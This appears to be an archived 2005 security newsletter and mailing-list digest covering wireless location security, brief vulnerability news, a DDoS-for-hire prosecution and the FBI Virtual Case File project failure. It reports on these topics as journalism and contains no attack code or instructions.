difficult to defend than a wired network. One main reason is that radio waves propagate. Unless your network has extremely sophisticated transmitters, antennas, and wave propagation limiters, controlling the extent to which your waves are traveling is very difficult. If intruders can pick up your Wi-Fi signals, they have some amount of access to the communication taking place. But encryption helps protect the data being transmitted, and AP and client security systems help prevent intrusion and service disruption. A number of security solutions are designed specifically to protect wireless networks, and they work reasonably well, but there is still room for improvement. In the near future, we'll see enhancements and features added to many of those solutions, and we'll undoubtedly see new solutions come to the marketplace. At the recent Intel Developer Forum, Justin Rattner, Intel senior fellow and director of Intel's Corporate Technology Group, demonstrated some interesting new wireless networking technology that could help improve security. The technology involves wireless devices that can become aware of a person's physical location, similar to GPS technology but without the need for orbiting satellites. The company said that its client location technology is currently accurate to within a 1-meter radius. In essence, an AP uses the new technology to determine a client's location by timing the transmission of data to and from the client. Because the rate of travel can be known, the distance between APs and clients can be calculated. AP antennas can play a significant role in the refinement of client location systems because the antennas can be designed to transmit signals within a specific area in a given direction. A specially designed AP antenna could allow an AP to determine where a client is located relative to the AP's position. I suspect that Intel's technology takes advantage of a somewhat unique antenna design as compared to typical AP antennas in use today. The security of wireless networks could be greatly improved by using client location awareness. In practice, an AP could be configured to allow connections only from devices that are within 30 feet. Similarly, wireless Intrusion Detection Systems (IDSs) could be set to detect any client systems attempting communication from farther away than a predefined distance from the AP. Of course the application of such technology isn't limited to enhanced security. During his demonstration, Rattner showed how he could be tracked in an on-stage mock-up of a home. As he moved from place to place, wireless transmission of a video broadcast was switched to the screen closest to him. However, to security administrators, this peek into the near future is most interesting because of the significant implications for improved network security. ==================== ==== Sponsor: Sherpa Software ==== Gone in 30 Days: Exchange, Retention, and Regulatory Compliance The advent of Sarbanes-Oxley, Gramm-Leach-Bliley, and assorted market-specific regulations means that you may be legally required to have an email compliance and retention policy. Download this free whitepaper now to learn general retention and compliance issues, gain an understanding of Microsoft Exchange Server's built-in archiving and compliance features and guidance on first steps to take when starting an archiving regime. Plus - discover how to analyze trends and usage across your messaging store; implement retention policies in Exchange mailboxes, PST files (network/local), public folders and more. http://list.windowsitpro.com/t?ctl=12DD1:4FB69 ==================== ==== 2. Security News and Features ==== Recent Security Vulnerabilities If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at http://list.windowsitpro.com/t?ctl=12DD8:4FB69 Another IE Flaw Surfaces Tom Ferris reported a new flaw in Microsoft Internet Explorer (IE) 6.0 on fully patched Windows XP Service Pack 2 (SP2) systems. While Ferris offered few details about the problem on his Web site, the vulnerability reportedly could allow a remote intruder to install remote code and completely take over an affected system. http://list.windowsitpro.com/t?ctl=12DE0:4FB69 Long Registry Keys Can Help Hide Malware Last week, an interesting discovery was made regarding the Windows registry. Apparently, long keys can't be viewed or deleted by using regedit or many third-party tools designed to detect malware. Registry keys that exceed 254 characters in length are basically invisible unless the tool being used to read the registry is designed to accommodate longer keys. http://list.windowsitpro.com/t?ctl=12DDE:4FB69 ==================== ==== Resources and Events ==== Avoid the 5 Major Compliance Pitfalls Based on real-world examples, this Web seminar will help C-level executives, as well as IT directors and managers, avoid common mistakes and give their organization a head start toward ensuring a successful compliance implementation. Register today and find out how you can avoid the mistakes of others, improve IT security, and reduce the cost of continually maintaining and demonstrating compliance. http://list.windowsitpro.com/t?ctl=12DD7:4FB69 Consolidate Your SQL Server Infrastructure Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. In this free Web seminar, learn how shared data clustering technology can reduce capital expenditures by at least 50 percent, improve management efficiency, reduce operational expense, ensure high availability across all SQL Server instances, and more. Find out how you can reduce the Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years. Sign up today! http://list.windowsitpro.com/t?ctl=12DD3:4FB69 Discover SQL Server 2005 for the Enterprise. Are you prepared? In this free, half-day event you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today! http://list.windowsitpro.com/t?ctl=12DD6:4FB69 Roll Back Data to Any Point in Time, Not Just to the Last Snapshot or Backup Have you ever lost data that was saved right after your last backup? Most of us have. Continuous, or real-time, backup systems provide real- time protection, but are they right for you? In this free Web seminar, you'll learn about the design principles that underlie continuous data protection solutions, how to integrate them with your existing backup infrastructure, and how best to apply continuous protection technologies to your Windows-based servers. http://list.windowsitpro.com/t?ctl=12DD4:4FB69 Get Ready for SQL Server 2005 Roadshow in Europe Back By Popular Demand - Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and one-year subscription to SQL Server Magazine. Register now! http://list.windowsitpro.com/t?ctl=12DD5:4FB69 ==================== ==== Featured White Paper ==== Is Your Exchange Server 2003 Environment Well Cared For? Get the bare and necessary facts you should know to maintain your Exchange Server 2003 environment, including critical strategies for predicting and responding to failures. Plus, you'll receive useful information about implementing proactive measures, such as preventive database maintenance, to ensure that your investment is well protected. http://list.windowsitpro.com/t?ctl=12DD2:4FB69 ==================== ==== 3. Security Toolkit ==== Security Matters Blog: Bam! Google Hacking Just Got Kicked Up a Notch by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=12DE2:4FB69 If Emeril Lagasse were a hacker, he'd probably be using the new Google mining toolset, Massive Enumeration Tool (MET). Written in the Python scripting language, MET is a collection of scripts designed to mine data from the gigantic databases stored by Google's search engine. http://list.windowsitpro.com/t?ctl=12DDD:4FB69 FAQ by John Savill, http://list.windowsitpro.com/t?ctl=12DE1:4FB69 Q: How can I set the default domain user profile? Find the answer at http://list.windowsitpro.com/t?ctl=12DDF:4FB69 Security Forum Featured Thread: Rights Required to Allow Changing Directory Ownership A forum participant writes that he's trying to use xcacls.vbs to allow his Help desk staff to change the owner on a user's home directory when it's initially created. The command-line options he uses (listed in the Security Forum post) work fine under his account, which has Domain Admin rights, but the Help desk technicians receive an error when they run the command with the same options. He's tried giving the Help desk technicians "Take ownership" and "Restore files" rights on the file server, but that doesn't fix the problem. If you can help, join the discussion at http://list.windowsitpro.com/t?ctl=12DD0:4FB69 ==================== ==== Announcements ==== (from Windows IT Pro and its partners) Stay Up-to-Date with the Windows IT Security Newsletter Every issue of Windows IT Security features coverage of the best security tools available and expert advice on the best way to implement security. Our expanded content includes even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get access to our entire online security article database (more than 1900 articles)! Subscribe today: http://list.windowsitpro.com/t?ctl=12DDA:4FB69 VIP Monthly Online Pass = Quick Security Answers! Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire Windows IT Security online article database, including exclusive subscriber-only content. That's a database of more than 1900 security articles to help you get all the answers you need, when you need them. Sign up now: http://list.windowsitpro.com/t?ctl=12DDB:4FB69 ==================== ==== 4. New and Improved ==== by Renee Munshi, products@windowsitpro.com Desktop Spyware Protection for SMBs St. Bernard Software offers SpyEXPERT, an antispyware software solution for desktop computers specifically designed to meet the needs of small-to-midsized businesses (SMBs). SpyEXPERT provides a centralized management console that administrators can use to scan and clean spyware from desktops. The console includes scheduling and reporting functions. SpyEXPERT's comprehensive database is continually updated through a variety of collaborative techniques. For more information, go to http://list.windowsitpro.com/t?ctl=12DE5:4FB69 Tell Us About a Hot Product and Get a T-Shirt! Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com. Editor's note: Share Your Security Discoveries and Get $100 Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length. ==================== ==== Sponsored Links ==== Argent versus MOM 2005 Download Argent Versus Microsoft Operations Manager 2005 http://list.windowsitpro.com/t?ctl=12DCF:4FB69 ==================== ==== Contact Us ==== About the newsletter -- letters@windowsitpro.com About technical questions -- http://list.windowsitpro.com/t?ctl=12DE4:4FB69 About product news -- products@windowsitpro.com About your subscription -- windowsitproupdate@windowsitpro.com About sponsoring Security UPDATE -- salesopps@windowsitpro.com ==================== This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today. http://list.windowsitpro.com/t?ctl=12DDC:4FB69 View the Windows IT Pro privacy policy at http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy Windows IT Pro, a division of Penton Media, Inc. 221 East 29th Street, Loveland, CO 80538 Attention: Customer Service Department Copyright 2005, Penton Media, Inc. All rights reserved. From isn at c4i.org Thu Sep 8 02:37:01 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:50:21 2005 Subject: [ISN] Hero BOFHs needed for Katrina relief work Message-ID: http://www.theregister.co.uk/2005/09/07/sans_recruits_katrina_volunteers/ By John Leyden 7th September 2005 The SANS Institute - best known for helping to track hacker activity via the Internet Storm Center - is helping to recruit tech-savvy volunteers to help care for people left homeless by Hurricane Katrina. Techies are needed to set up PCs and wireless networks at shelters and at Red Cross headquarters in Washington DC to install security software tools. The Red Cross HQ needs people who know how to tune Cisco IDS, NetIQ Manager and McAfee ePolicy Orchestrator tools. People who live near the shelters and have experience in deploying Windows XP or Cisco systems - or Washington-based security experts - can register to help on the SANS's website here [1]. SANS is collating this info and passing it on to the Red Cross. Meanwhile SANS handler Tom Liston is verifying hurricane related URLs to root out scam artists. Hundreds of Katrina-themed domains have been registered since the storm hit the US Gulf Coast last week. As well as helping to recruit volunteers, SANS is also donating $100K to the Red Cross. ? [1] http://isc.sans.org/ From isn at c4i.org Sat Sep 10 00:06:57 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:35:34 2005 Subject: [ISN] Security consortium offers C&A credential Message-ID: http://www.fcw.com/article90695-09-08-05-Web By Florence Olsen Sep. 8, 2005 The International Information Systems Security Certification Consortium (ISC)2 has begun certifying government employees for a professional certification and accreditation (C&A) credential that it developed in cooperation with the State Department. Consortium officials said the new credential is timely because all federal agencies must certify and accredit major information systems and applications under the Federal Information Security Management Act (FISMA). "We felt the time was right for (ISC)2 to develop a credential to support it," said Rolf Moulton, president and interim chief executive officer of the consortium, a nonprofit group that certifies information security employees. Security experts devised the C&A process to ensure that information systems are reasonably secure given the risks to which they are exposed. FISMA requires federal agencies to perform C&A on information systems every three years or whenever systems are significantly modified. To qualify for the Certification and Accreditation Professional (CAP) credential, a person must have two years of direct experience doing C&A work. The person must also pass a CAP exam and subscribe to the consortium's code of ethics, according to the announcement. Consortium officials said that W. Hord Tipton, chief information officer at the Interior Department, and Jane Scott Norris, chief information security officer at the State Department, were in the first group who passed the CAP exam. State's security experts helped (ISC)2 develop the certification exam. To maintain their CAP credential, security employees must earn 60 hours of continuing education credits every three years, pay annual maintenance fees and abide by the consortium's code of ethics, (ISC)2 officials said. From isn at c4i.org Sat Sep 10 00:07:12 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:36:08 2005 Subject: [ISN] Temperatures run high in IT health security debate Message-ID: http://www.computerworld.com.au/index.php/id%3B1373164455%3Bfp%3B16%3Bfpid%3B0 Michael Crawford 09/09/2005 The author of a study into firewalls prepared for general practitioners under the Broadband for Health program claims it has been dumbed down so much by federal health bureaucrats, the document is now virtually useless as an IT security guide. The author Dr Horst Herb, director of the Dorrigo Medical Centre in NSW, is demanding his name be stripped from the final report. Once a systems auditor, penetration tester and mainframe security analyst for Siemens, Dr Herb spent the last five months advising the government on minimum firewall standards for GPs. Horst said he believes the government is not serious about IT security when it comes to e-health. Although Herb's work has been published as part of the GPCG (General Practice Computing Group) Security Firewall Guidelines, he said many core technical aspects and product-specific analysis had been stripped out of the recommendations. As a result, he said, the document prepared as an IT security guide for GPs has reached the point of irrelevance. A Department of Health and Ageing spokesperson, asked to respond to Dr Herb's allegations, said the submitted report was "overly-technical" and had to be "simplified extensively" so that could GPs understand it. "The original document was very technical," Herb said. "But that was the whole point, to raise interest and technical understanding of what is involved for GPs. Even if the doctors were to commission out implementing firewalls they would still need to emulate skills of the person that set it up, because generally, there is no formal qualification for implementing firewalls or formal liabilities for firewalls," Herb said. Herb also warned many IT security products are not strong enough to protect highly sensitive, personal information. "The main problem I had was with personal firewalls, which is just software on a computer which is, in my opinion pointless in a surgery scenario because they have too many vulnerabilities - all it takes is downloading software to disable it. GPs need a dedicated firewall where no user can dabble with it," he said. "Surgeries should not rely on basic or personal firewalls. This [detail] was edited out of the original report, mainly so [telecommunications vendors] can just push a default firewall setting as acceptable - it is just pure nonsense." Herb said while the strong security message was being lost on GPs as a result, though he is glad some security information has been released. However, Herb is insisting his name be stripped from the report, because he does not want to be held liable for anyone considering a personal firewall as a viable IT security solution for doctors. Since the report was published, the federal government has axed funding for GPCG, which provided IT support and advice for doctors and clinicians. It ran for eight years under an annual, million-dollar government grant. The Department of Health and Ageing spokesperson said all doctors involved with the now defunct General Practice Computing Group considered the original document to be far too complicated. However, when it was "simplified extensively", they gave it their full endorsement. The department claims the document has since been well received by doctors, despite the GPCG being disbanded. From isn at c4i.org Sat Sep 10 00:07:28 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:36:22 2005 Subject: [ISN] Hackers Admit to Wave of Attacks Message-ID: http://www.wired.com/news/privacy/0,1848,68800,00.html By Kevin Poulsen Sept. 08, 2005 An Ohio computer hacker who served as a digital button man for a shady internet hosting company faces prison time after admitting he carried out one of a series of crippling denial-of-service attacks ordered by a wealthy businessman against his competitors. In a deal with prosecutors, Richard "Krashed" Roby, 20, pleaded guilty in federal court in Toledo last month to intentionally damaging a protected computer, after launching a 2003 attack on an online satellite TV retailer that caused at least $120,000 in losses. "There were a lot of big-time people making a lot of money who picked up on him and persuaded him to do this, without a lot in it for him," says Mark Weinberg, Roby's attorney. "He's one of these people who are brilliant in one area but absolutely lacking in common sense in others." Jay Echouafni, the 38-year-old satellite TV mogul who allegedly ordered and funded the cyberhits, went on the lam last year, and remains a fugitive from a federal indictment out of Los Angeles. In a related deal, 31-year-old Paul Ashley, former operator of the Foonet hosting service, admitted to recruiting three other computer intruders to carry out Echouafni's orders. He has not yet entered a guilty plea. Under federal sentencing guidelines, Ashley faces 70 to 87 months in prison for his role in the attacks, but the terms of his plea agreement make him eligible for a reduced sentence in exchange for his testimony against other defendants. "If Ashley were to cooperate with the government and, for example, testify against Echouafni, he could get a departure from his sentence," said Los Angeles assistant U.S. attorney James Aquilina, who's prosecuting the case. Roby faces 18 months to two years in prison under sentencing guidelines. Until it was shuttered by an FBI raid last year, Ashley ran Foonet from a basement server room in his suburban Ohio home. The enterprise enjoyed a double-edged reputation for providing hosting that could stand up to distributed denial of service, or DDOS, attacks, even as it gave safe harbor to members of the computer underground drawn to the bulletproof service. "Every script kiddy on IRC had a shell there," says Andrew Kirch, a security administrator for the Abusive Hosts Blocking List. "Spamming, hacking, phishing, DDOS networks -- you want to run scans for a large amount of IP space for prevalent Windows vulnerabilities? Set up there." In his plea agreement, Ashley admitted he knowingly allowed clients and employees to control networks of compromised Windows machines, or "bots," from Foonet. That came in handy in October 2003, when Echouafni, a Foonet client, offered Ashley $1,000 to snuff out two websites. Echouafni, who was CEO of Massachusetts-based Orbit Communication at the time, allegedly claimed that competitors RapidSatellite.com and WeaKnees.com had stolen his content and attacked his online business, which sold satellite TV gear over the web. Ashley took the money and, according to his plea agreement, recruited three associates to do the dirty work: Jonathan Hall, Lee Walker and Joshua Schichtel, known online as "Rain," "sorCe" and "Emp" respectively. Hall, who is not currently charged in the case, says the offer marked a change in Ashley's business practices. "Prior to Jay asking for all that crap, Paul Ashley never really asked me to launch large-scale attacks like that," Hall said in a telephone interview. Roby was pulled into the gang by Schichtel, who found his network of 3,000 bots inadequate to take down Miami-based RapidSatellite, according to court records. Roby's resources were more formidable: The young hacker controlled approximately 15,000 Windows machines that he'd taken over with a variant of the Spybot worm. Schichtel allegedly promised Roby a free Foonet shell account in exchange for turning those hacked PCs against RapidSatellite. "Foolish," says attorney Weinberg. The FBI described the ensuing attack as a tenacious, 10-day deluge that tracked RapidSatellite through three ISP changes, and briefly blocked Amazon.com and the website of the Department of Homeland Security, which had the poor luck of sharing service providers with Echouafni's rival. A concurrent attack allegedly launched by the other members of the crew took a similar toll on WeaKnees.com. Apparently pleased with the results, Echouafni went on to purchase Foonet from Ashley, retaining Ashley as an employee and hiring Hall to handle cybersecurity for the company. In February of last year, Echouafni allegedly ordered a third attack on another competitor, ExpertSatellite.com. Prosecutors filed the first round of charges against Ashley and his alleged co-conspirators last year, then dropped them during plea negotiations with some of the defendants. Schichtel could not be reached for comment for this story, and Ashley's attorney failed to return repeated phone calls. Roby's lawyer says the young hacker had little to offer prosecutors in exchange for a sweeter deal. "When you're at the bottom of the barrel, there's not much you can tell them," says Weinberg. "Usually the people who are at the top have the ability to provide the most substantial assistance." Aquilina says prosecution is proceeding against Walker in the United Kingdom, where Walker lives. Hall is a resident of flooded New Orleans. Speaking with Wired News from the Houston hotel to which he evacuated with his family, he says he never participated in the attacks, even after Echouafni ordered one personally, as his boss. "The first time he asked me to launch some stupid-ass attack, he claimed that the company had hacked his database and wiped it out," says Hall. "I knew it was bullshit." When Echouafni threatened to fire Hall, the then-teenaged hacker promised to carry out the order, but never did, he claims. "He kept catching on that the attacks weren't going through, and he kept climbing up my ass and saying that they're not working. But I never actually did it.... Jay was an asshole." Hall says he stopped attacking computers when he was 16. Echouafni skipped out on $750,000 bail secured by his house in Massachusetts last year. Law enforcement officials believe he's now living in his native Morocco. From isn at c4i.org Sat Sep 10 00:27:35 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:37:14 2005 Subject: [ISN] Who Killed the Virtual Case File? Message-ID: http://www.spectrum.ieee.org/WEBONLY/publicfeature/sep05/0905fbi.html By Harry Goldstein 08 Sept 2005 In the early 1990s, Russian mobsters partnered with Italian Mafia families in Newark, N.J., to skim millions of dollars in federal and New Jersey state gasoline and diesel taxes. Special Agent Larry Depew set up an undercover sting operation under the direction of Robert J. Chiaradio, a supervisor at the Federal Bureau of Investigation's Washington, D.C., headquarters. Depew collected reams of evidence from wiretaps, interviews, and financial transactions over the course of two and a half years. Unfortunately, the FBI couldn't provide him with a database program that would help organize the information, so Depew wrote one himself. He used it to trace relationships between telephone calls, meetings, surveillance, and interviews, but he could not import information from other investigations that might shed light on his own. So it wasn't until Depew mentioned the name of a suspect to a colleague that he obtained a briefcase that his friend had been holding since 1989. "When I opened it up, it was a treasure trove of information about who's involved in the conspiracy, including the Gambino family, the Genovese family, and the Russian components. It listed percentages of who got what, when people were supposed to pay, the number of gallons. It became a central piece of evidence," Depew recalled during an interview at the FBI's New Jersey Regional Computer Forensic Laboratory, in Hamilton, where he is the director. "Had I not just picked up the phone and called that agent, I never would have gotten it." A decade later, Depew's need to share information combined with his do-it-yourself database skills and connection to his old supervisor, Chiaradio, would land him a job managing his first IT project - the FBI's Virtual Case File. Depew's appointment to the FBI's VCF team was an auspicious start to what would become the most highly publicized software failure in history. The VCF was supposed to automate the FBI's paper-based work environment, allow agents and intelligence analysts to share vital investigative information, and replace the obsolete Automated Case Support (ACS) system. Instead, the FBI claims, the VCF's contractor, Science Applications International Corp. (SAIC), in San Diego, delivered 700 000 lines of code so bug-ridden and functionally off target that this past April, the bureau had to scrap the US $170 million project, including $105 million worth of unusable code. However, various government and independent reports show that the FBI - lacking IT management and technical expertise?shares the blame for the project's failure. In a devastating 81-page audit, released in 2005, Glenn A. Fine, the U.S. Department of Justice's inspector general, described eight factors that contributed to the VCF's failure. Among them: poorly defined and slowly evolving design requirements; overly ambitious schedules; and the lack of a plan to guide hardware purchases, network deployments, and software development for the bureau. Fine concluded that four years after terrorists crashed jetliners into the World Trade Center and the Pentagon, the FBI, which had been criticized for not "connecting the dots" in time to prevent the attacks, still did not have the software necessary to connect any new dots that might come along. And won't for years to come. "The archaic Automated Case Support system - which some agents have avoided using - is cumbersome, inefficient, and limited in its capabilities, and does not manage, link, research, analyze, and share information as effectively or timely as needed," Fine wrote. "[T]he continued delays in developing the VCF affect the FBI's ability to carry out its critical missions." This past May, a month after it officially ended the VCF project, the FBI announced that it would buy off-the-shelf software at an undisclosed cost to be deployed in phases over the next four years. Until those systems are up and running, however, the FBI will rely on essentially the same combination of paper records and antiquated software that the failed VCF project was supposed to replace. The only recent addition has been a new "investigative data warehouse" that combines several of the FBI's crime and evidence databases into one. It was completed as the VCF started its final slide into oblivion. In addition, the FBI recently digitized millions of its paper documents and made them available to agents. As the FBI gears up to spend hundreds of millions more on software over the next several years, questions persist as to how exactly the VCF went so terribly wrong and whether a debacle of even bigger proportions looms on the horizon. Despite high-profile Congressional hearings, hundreds of pages of reports churned out by oversight bodies, and countless anguished articles in the trade press and mainstream media, the inner workings of the project and the major players have remained largely invisible. Now, detailed interviews with people directly involved with the VCF paint a picture of an enterprise IT project that fell into the most basic traps of software development, from poor planning to bad communication. Lost amid the recriminations was an early warning from one member of the development team that questioned the FBI's technical expertise, SAIC's management practices, and the competence of both organizations. Matthew Patton, a security expert working for SAIC, aired his objections to his supervisor in the fall of 2002. He then posted his concerns to a Web discussion board just before SAIC and the FBI agreed on a deeply flawed 800-page set of system requirements that doomed the project before a line of code was written. His reward: a visit from two FBI agents concerned that he had disclosed national security secrets on the Internet. To understand why the VCF was so important, you've got to understand the FBI. And to understand the FBI, you've got to understand its organization and its agents. The bureau, headquartered in the J. Edgar Hoover Building in Washington, D. C., currently has 23 divisions, including counterintelligence, criminal investigation, and cybercrime. The divisions fall under the control of five executive assistant directors responsible for intelligence, counterterrorism and counterintelligence, criminal investigations, law enforcement services (such as labs and training), and administration. Until last year, each division had its own IT budget and systems. And because divisions had the freedom and money to develop their own software, the FBI now has 40 to 50 different investigative databases and applications, many duplicating the functions and information found in others. Last year, in an effort to centralize IT operations and eliminate needless redundancies, the FBI's chief information officer, who reports to the director, took charge of all its IT budgets and systems. The bureau's 12 400 agents work out of 56 field offices and 400 satellite - or resident agency?offices, as well as 51 Legal Attach? offices scattered across the globe in U.S. embassies and consulates. A field agent works as part of a squad; each squad has a supervisor, who reports to the assistant special agent in charge, who in turn reports to the special agent in charge of the field office. Agents investigate everything from counterterrorism leads to bankruptcy fraud, online child pornography rings to corrupt public officials, art thefts to kidnappings. They interview witnesses, develop informants, conduct surveillance, hunt for clues, and collaborate with local law enforcement to find and arrest criminals. Agents document every step and methodically build case files. They spend a tremendous amount of time processing paperwork, faxing and FedEx-ing standardized memo and requisition forms through the approval chain - up to the squad supervisor and eventually to the special agent in charge. This system of forms and approvals stretches back to the 1920s, when J. Edgar Hoover, director from 1924 to 1972, standardized all of the bureau's investigative reports on forms, so an agent could walk into any FBI office and find the same system. Today, the bureau has hundreds of standard forms. To record contact with an informant, fill out Form FD-209. When getting married or divorced, complete Form FD-292. To report information gleaned from an interview that may later become testimony, use Form FD-302. To conduct a wiretap, file Form FD-472. To wire an informant with a body recorder and transmitter, submit Form FD-473. After traveling overseas for business or pleasure, report the experience on Form FD-772. Plan an arrest with Form FD-888. Open a drug investigation with Form FD-920. Forms related to investigations, such as those used to report interviews with witnesses, wend their way up and down the approval chain. Once the appropriate supervisors sign off on the form, it goes back to the agent, who gives it to a clerk to enter into the ACS system. From there, the paper form is filed as part of the official record of the case. Sometimes, though the FBI officially denies this, an agent doesn't enter all case notes into ACS. Some agents think, "If I don't trust ACS because I don't think it will protect my informant or my asset, I'm not putting the data in there," said Depew, an avid user of ACS who touted the electronic system to his fellow agents as safer than a paper filing system. FBI spokesperson Megan Baroska emphasized in an e-mail that Depew did not speak for the bureau in this instance. "The FBI policy is for all official records to be entered into ACS. Additionally, 'notes' per say [sic] are not entered into ACS; they are first memorialized in a 302 form, and that form is entered into ACS. As for the 'notes,' they are kept in storage as a paper file because they legally have to be discoverable." When asked during an interview at FBI headquarters if agents felt uncomfortable about exchanging a paper-based system for an electronic one, the FBI's current CIO, Zalmai Azmi, didn't think agents would find it hard to get into the habit of processing forms electronically. But introducing an electronic record-keeping system does raise legal policy questions in their minds. "What is a record and what is available under discovery? In a paper world, you do your job, you do your notes, and if you don't like it, it goes somewhere," Azmi said. "In an electronic world, nothing really is destroyed; it's always somewhere." DESPITE AGENTS' RELUCTANCE to embrace the digital age, in 2000 the bureau finally began to deal with its outdated IT systems. At the time, under the direction of Louis J. Freeh, the bureau had neither a CIO nor documentation detailing its IT systems, much less a plan for revamping them. The task of creating such a plan fell to former IBM executive Bob E. Dies, who became assistant director in charge of the FBI Information Resources Division on 17 July 2000. He was the first of five officials who, over the next four years, would struggle to lead the FBI's sprawling and antiquated information systems and get the VCF project under way. According to a 2002 report from the DOJ's Office of the Inspector General, when Dies arrived, 13,000 computers could not run modern software. Most of the 400 resident agency offices were connected to the FBI intranet with links about the speed of a 56-kilobit-per-second modem. Many of the bureau's network components were no longer manufactured or supported. And agents couldn't e-mail U.S. Attorney offices, federal agencies, local law enforcement, or each other; instead, they typically faxed case-related information. In September 2000, Congress approved $379.8 million over three years for what was then called the FBI Information Technology Upgrade Project. Eventually divided into three parts, the program became known as Trilogy. The Information Presentation Component would provide all 56 FBI field offices, some 22,000 agents and support staff, with new Dell Pentium PCs running Microsoft Office, as well as new scanners, printers, and servers. The Transportation Network Component would provide secure local area and wide area networks, allowing agents to share information with their supervisors and each other. But the User Applications Component, which would ultimately become the VCF, staked out the most ambitious goals. First, it was to make the five most heavily used investigative applications - the Automated Case Support system, IntelPlus, the Criminal Law Enforcement Application, the Integrated Intelligence Information Application, and the Telephone Application - accessible via a point-and-click Web interface. Next, it would rebuild the FBI's intranet. Finally, it was supposed to identify a way to replace the FBI's 40-odd investigative software applications, including ACS. Based on the 1970s-era database Adabas and written in a programming language called Natural, both from Software AG, Darmstadt, Germany, the Automated Case Support system, which debuted in 1995, was antiquated even as it was deployed - and it is still being used today. Originally, agents and clerks accessed the program via vintage IBM 3270 green-screen terminals connected to a mainframe over dedicated lines. Eventually, the 3270 terminals were emulated on standard desktop PCs. By navigating complicated menus using function keys and keystroke commands, agents could do basic Boolean and keyword searches for things like an informant's name or the dates of a wiretap surveillance, information related to cases they were working. But according to Depew, only the most dedicated, computer-savvy agents had the skills and patience to learn the arcane system, let alone exploit it to its full potential. "Nobody really understood why we would even use ACS other than as an index," said Depew. A notable exception: Robert Hanssen, the notorious FBI traitor, used the system to find documents his Russian handlers might find useful, as well as to check to see if anyone at the FBI was onto him [see "Mission Impossible," IEEE Spectrum, April 2003]. In May and June 2001, the bureau awarded Trilogy contracts to two major U.S. government contractors: DynCorp, of Reston, Va., for the hardware and network projects, and to SAIC for software. All three Trilogy components were to be delivered by the middle of 2004. Instead of paying a fixed price for the hardware, networks, and software, the FBI used cost-plus-award fee contracts. These would pay the cost of all labor and materials plus additional money if the contractor managed costs commendably. Crucially, if the scope of the project expanded or if the contractor incurred other unforeseen costs, the FBI would have to pick up those, too. ON 4 SEPTEMBER 2001, Robert S. Mueller III became the tenth director in FBI history. One week later, terrorists pulverized New York City's World Trade Center and a piece of the Pentagon. The inability of FBI agents to share the most basic information about Al Qaeda's U.S. activities blew up into a front-page scandal. Within days, the FBI's pathetic technology infrastructure went from being so much arcane trivia to a subject of daily fulmination by politicians and newspaper columnists. As The 9/11 Commission Report would conclude in 2004, "the FBI's information systems were woefully inadequate. The FBI lacked the ability to know what it knew; there was no effective mechanism for capturing or sharing its institutional knowledge." In the face of intense public and congressional pressure, Mueller shifted Trilogy into high gear. In October, he pulled Chiaradio up from his position as special agent in charge of the field office in Tampa, Fla., to Hoover Building headquarters in Washington, to advise him on the all-important software component of Trilogy. An accountant by training, Chiaradio would become the FBI's executive assistant director for administration in December 2001. After discussions with Mueller, Chiaradio determined that the FBI's basic plan for the software portion of Trilogy - slapping a Web interface onto the ACS system and the four other programs - wasn't going to make agents more effective. So to help him figure out what would work, he brought in Depew. [See timeline, "Countdown to Catastrophe."] Partial to dark suits and wraparound shades, Depew kept his gray hair closely cropped and a pistol holstered on his belt. He was a G-man's G-man. And he embraced technology with an almost evangelical zeal. When he was working the New Jersey fuel oil case in the early 1990s, Depew not only coded his own case management database using the FoxPro program, but he put it on floppy disks and gave it to any agent who asked for a copy. Depew joined a team of seven that assessed the Web interface SAIC was designing for the ACS system. When completed, the interface would let agents point and click their way through the tedious process of filling out official forms, but not much else. Recognizing the limitations of the interface and ACS, Chiaradio and Depew met with Dies. They convinced him, and later the director himself, that the bureau needed an entirely new database, graphical user interface, and applications, which would let agents search across various investigations to find relationships to their own cases. The new case management system would host millions of records containing information on everything from witnesses, suspects, and informants to evidence such as documents, photos, and audio recordings. To address concerns being raised by intelligence experts and lawmakers in the wake of 9/11, these records would be accessible to both the FBI's agents and its intelligence analysts. Chiaradio dubbed the new system the Virtual Case File. Dies wanted to provide agents with this software as fast as possible. In Depew's view that meant "shooting from the hip." This cavalier approach to software development would prove fatal to the VCF. Today, many organizations rely on a blueprint - known in IT parlance as an enterprise architecture - to guide hardware and software investment decisions. This blueprint describes at a high level an organization's mission and operations, how it organizes and uses technology to accomplish its tasks, and how the IT system is structured and designed to achieve those objectives. Besides describing how an organization operates currently, the enterprise architecture also states how it wants to operate in the future, and includes a road map - a transition plan - for getting there. The problem was, the FBI didn't have such a blueprint, as numerous reports from the Government Accountability Office, the DOJ's inspector general, and the National Research Council subsequently pointed out. Without it, the bureau could not, as a 2004 report from the NRC stated, "make coherent or consistent operational or technical decisions" about linking databases, creating policies and methods for sharing data, and making tradeoffs between information access and security. With no detailed description of the FBI's processes and IT infrastructure as a guideline, Depew said that his team of agents began "to feel our way in the dark," to characterize investigative processes such as witness interviews and surveillance operations and map them to the FBI's software and databases. Over a six-week period in the fall of 2001, 